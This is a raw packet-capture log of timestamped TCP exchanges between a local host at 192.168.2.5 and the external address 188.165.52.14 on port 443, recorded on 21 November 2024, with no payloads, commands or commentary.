                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.648086071 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.648102999 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.648250103 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.648272038 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.648329020 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.760806084 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.760824919 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.761018991 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.761043072 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.761146069 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.767788887 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.767805099 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.767954111 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.767961979 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.768006086 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.773503065 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.773520947 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.773581982 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.773588896 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.773622036 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.781642914 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.781660080 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.781729937 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.781738043 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.781769991 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.790674925 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.790689945 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.790788889 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.790796041 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.790874958 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.797966957 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.797981977 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.798031092 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.798038006 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.798078060 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.798093081 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.805527925 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.805541992 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.805593014 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.805613995 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.805660963 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.892499924 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.892518044 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.892760038 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.892796993 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.892896891 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.957331896 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.957350016 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.957484961 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.957494974 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.957542896 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.964828968 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.964848042 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.964936018 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.964942932 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.964992046 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.972403049 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.972421885 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.972486019 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.972501040 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.972536087 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.980169058 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.980189085 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.980274916 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.980281115 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.980324030 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.986944914 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.986963987 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.987034082 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.987040997 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.987092018 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.994297028 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.994317055 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.994362116 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.994369030 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:14.994481087 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.002180099 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.002197981 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.002258062 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.002266884 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.002304077 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.084970951 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.084996939 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.085167885 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.085206032 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.085247993 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.149051905 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.149070978 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.149216890 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.149247885 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.149293900 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.156886101 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.156899929 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.156965971 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.156972885 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.157027960 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.164427042 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.164453983 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.164520025 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.164526939 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.164562941 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.172149897 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.172169924 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.172229052 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.172236919 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.172271013 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.179512978 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.179532051 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.179608107 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.179615974 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.179655075 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.186000109 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.186014891 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.186077118 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.186084032 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.186115980 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.193737984 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.193758011 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.193833113 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.193840027 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.193872929 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.276746035 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.276765108 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.276885033 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.276892900 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.276945114 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.341794014 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.341816902 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.341917038 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.341949940 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.341990948 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.349457026 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.349473953 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.349558115 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.349565029 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.349601030 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.355382919 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.355398893 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.355490923 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.355498075 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.355546951 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.361462116 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.361478090 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.361550093 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.361557007 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.361587048 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.368376970 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.368392944 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.368458033 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.368464947 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.368495941 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.374922037 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.374941111 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.374998093 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.375051022 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.375056028 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.375089884 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.381931067 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.381947041 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.382026911 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.382034063 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.382071972 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.468857050 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.468880892 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.469031096 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.469048023 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.469099045 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.533901930 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.533924103 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.534053087 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.534076929 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.534159899 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.541965008 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.541982889 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.542042971 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.542049885 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.542088985 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.548824072 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.548842907 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.548907042 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.548914909 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.548953056 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.555197001 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.555219889 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.555306911 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.555336952 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.555381060 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.561820984 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.561837912 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.561924934 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.561938047 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.561980963 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.568236113 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.568253040 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.568300962 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.568310022 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.568345070 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.568366051 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.574019909 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.574035883 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.574099064 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.574106932 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.574145079 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.662708998 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.662727118 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.662879944 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.662894011 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.662947893 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.725883961 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.725902081 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.726020098 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.726030111 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.726084948 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.732822895 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.732839108 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.732903004 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.732909918 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.732956886 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.739795923 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.739814997 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.739917994 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.739927053 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.739980936 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.745812893 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.745831966 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.745917082 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.745928049 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.745960951 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.753583908 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.753601074 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.753722906 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.753746033 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.753787041 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.760118961 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.760143042 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.760245085 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.760260105 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.760328054 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.766017914 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.766040087 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.766136885 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.766148090 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.766344070 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.853204966 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.853231907 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.853331089 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.853363991 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.853409052 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.926701069 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.926728010 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.926841974 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.926867962 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.926912069 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.933917046 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.933938026 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.934026003 CET49824443192.168.2.5188.165.52.14
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.934042931 CET44349824188.165.52.14192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:15.934082031 CET49824443192.168.2.5188.165.52.14
